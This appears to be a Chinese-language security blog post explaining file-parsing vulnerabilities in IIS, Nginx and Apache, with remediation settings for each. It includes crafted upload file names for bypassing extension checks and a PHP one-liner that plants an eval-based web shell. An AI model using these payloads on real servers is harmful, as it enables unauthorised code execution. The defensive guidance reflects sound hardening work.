<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		
		<meta name="author" content="ifish">
		
		<meta name="generator" content="Hugo 0.54.0" />
		<title>服务器解析漏洞 &middot; if1sh</title>
		<link rel="shortcut icon" href="https://ifishzz.github.io//images/favicon.ico">
		<link rel="stylesheet" href="https://ifishzz.github.io//css/style.css">
		<link rel="stylesheet" href="https://ifishzz.github.io//css/highlight.css">

		
		<link rel="stylesheet" href="https://ifishzz.github.io//css/font-awesome.min.css">
		

		

		
	</head>

    <body>
       <nav class="main-nav">
	
	
		<a href='https://ifishzz.github.io/'> <span class="arrow">←</span>Home</a>
	
	<a href='https://ifishzz.github.io//posts'>Archive</a>
	
	<a href='https://ifishzz.github.io//categories'>Cate</a>
	<a href='https://ifishzz.github.io//links'>Link</a>

	<a href='https://ifishzz.github.io//about'>About</a>

	

	
	<a class="cta" href="https://ifishzz.github.io/index.xml">Subscribe</a>
	
</nav>


        <section id="wrapper" class="post">
            <article>
                <header>
                    <h1>
                        服务器解析漏洞
                    </h1>
                    <h2 class="headline">
                    Mar 7, 2019 00:00
                    · 1048 words
                    · 3 minute read
                      <span class="tags">
                      
                      
                          
                              <a href="https://ifishzz.github.io//tags/%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E">解析漏洞</a>
                          
                      
                      
                      </span>
                    </h2>
                </header>
                
                  
                    <div id="toc">
                      <nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#iis解析漏洞">IIS解析漏洞</a></li>
<li><a href="#畸形解析漏洞">畸形解析漏洞</a></li>
<li><a href="#nginx解析漏洞">nginx解析漏洞</a></li>
<li><a href="#apache解析漏洞">apache解析漏洞</a></li>
</ul></li>
</ul>
</nav>
                    </div>
                  
                
                <section id="post-body">
                    

<h2 id="iis解析漏洞">IIS解析漏洞</h2>

<p>IIS 6.0 解析利用方法有两种：</p>

<ol>
<li>目录解析</li>
</ol>

<pre><code>/xx.asp/xx.jpg
/xx.asa/xx.jpg
</code></pre>

<ol>
<li>文件解析</li>
</ol>

<pre><code>/xx.asp;.jpg  
/xx.asp:.jpg(此处需抓包修改文件名)
</code></pre>

<ol>
<li><p>默认解析</p>

<pre><code>/xx.asa
/xx.cer
/xx.cdx
</code></pre></li>

<li><p>修复方案</p></li>
</ol>

<ul>
<li><p>目前尚无微软官方的补丁，可以通过自己编写正则，阻止上传xx.asp;.jpg类型的文件名。</p></li>

<li><p>做好权限设置，限制用户创建文件夹。</p></li>
</ul>

<h2 id="畸形解析漏洞">畸形解析漏洞</h2>

<p>IIS7.5/ IIS 7.0/ Nginx &lt;8.03</p>

<p>默认Fast-CGI开启状况下</p>

<pre><code>&lt;?php fputs(fopen('shell.php','w'),'&lt;?php eval($_POST[cmd]?&gt;');?&gt;

cat 1.php &gt;&gt; 1.jpg 
</code></pre>

<p>访问1.jpg/.php,在这个目录下就会生成一句话木马shell.php。</p>

<h2 id="nginx解析漏洞">nginx解析漏洞</h2>

<p>Nginx默认是以CGI的方式支持PHP解析的，普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问www.xx.com/phpinfo.jpg/1.php 这个URL时，$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”，然后构造成SCRIPT_FILENAME传递给PHP CGI，但是PHP为什么会接受这样的参数，并将phpinfo.jpg作为PHP文件解析呢?这就要说到fix_pathinfo这个选项了。 如果开启了这个选项，那么就会触发在PHP中的如下逻辑：</p>

<p>PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会将phpinfo.jpg作为PHP文件来解析了</p>

<p>Nginx &lt;=0.8.37</p>

<p>在Fast-CGI关闭的情况下，Nginx &lt;=0.8.37 依然存在解析漏洞</p>

<ol>
<li>Ngnix空字节可远程执行代码漏洞</li>
</ol>

<pre><code>/1.jpg/1.php
/1.jpg%00.php
/1.jpg/%20\0.php
</code></pre>

<ol>
<li>修复方案</li>
</ol>

<ul>
<li><p>修改php.ini文件，将cgi.fix_pathinfo的值设置为0;</p></li>

<li><p>在Nginx配置文件中添加以下代码：</p></li>
</ul>

<pre><code>　　if ( $fastcgi_script_name ~ ..*/.*php ){
　　return 403;
　　}
</code></pre>

<p>　　这行代码的意思是当匹配到类似test.jpg/a.php的URL时，将返回403错误代码。</p>

<h2 id="apache解析漏洞">apache解析漏洞</h2>

<p>Apache 解析文件的规则是从右到左开始判断解析,直到可识别</p>

<ol>
<li>后缀解析</li>
</ol>

<pre><code>/xx.php.php3.phtml.php4.php5 
</code></pre>

<ol>
<li>其余配置漏洞</li>
</ol>

<ul>
<li><p>如果在 Apache 的 conf 里有这样一行配置 <code>AddHandler php5-script .php</code>这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。</p></li>

<li><p>如果在 Apache 的 conf 里有这样一行配置 <code>AddType application/x-httpd-php .jpg</code>即使扩展名是 jpg，一样能以 php 方式执行。</p></li>
</ul>

<ol>
<li>修复方案</li>
<li>apache配置文件，禁止.php.这样的文件执行，配置文件里面加入
<br /></li>
</ol>

<pre><code>&lt;Files ~ “.(php.|php3.)”&gt;
        Order Allow,Deny
        Deny from all
&lt;/Files&gt;
</code></pre>

<ul>
<li><p>用伪静态能解决这个问题，重写类似.php.*这类文件，打开apache的httpd.conf找到LoadModule rewrite_module modules/mod_rewrite.so</p>

<p>把#号去掉，重启apache,在网站根目录下建立.htaccess文件,代码如下:</p></li>
</ul>

<pre><code>&lt;IfModule mod_rewrite.c&gt;
RewriteEngine On
RewriteRule .(php.|php3.) /index.php
RewriteRule .(pHp.|pHp3.) /index.php
RewriteRule .(phP.|phP3.) /index.php
RewriteRule .(Php.|Php3.) /index.php
RewriteRule .(PHp.|PHp3.) /index.php
RewriteRule .(PhP.|PhP3.) /index.php
RewriteRule .(pHP.|pHP3.) /index.php
RewriteRule .(PHP.|PHP3.) /index.php
&lt;/IfModule&gt;
</code></pre>

                </section>
            </article>

            
                

            

            

            

            <footer id="footer">
    
    
    <p class="small">
        Powered by <a href="http://www.gohugo.io/">Hugo</a> Theme By <a href="https://github.com/ifishzz">ifish</a>
    </p>
</footer>

        </section>

        <script src="https://ifishzz.github.io//js/jquery-3.3.1.min.js"></script>
<script src="https://ifishzz.github.io//js/main.js"></script>
<script src="https://ifishzz.github.io//js/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>




  



<script>
var baiduAnalytics = '';
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?" + baiduAnalytics;
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();
</script>


    </body>
</html>
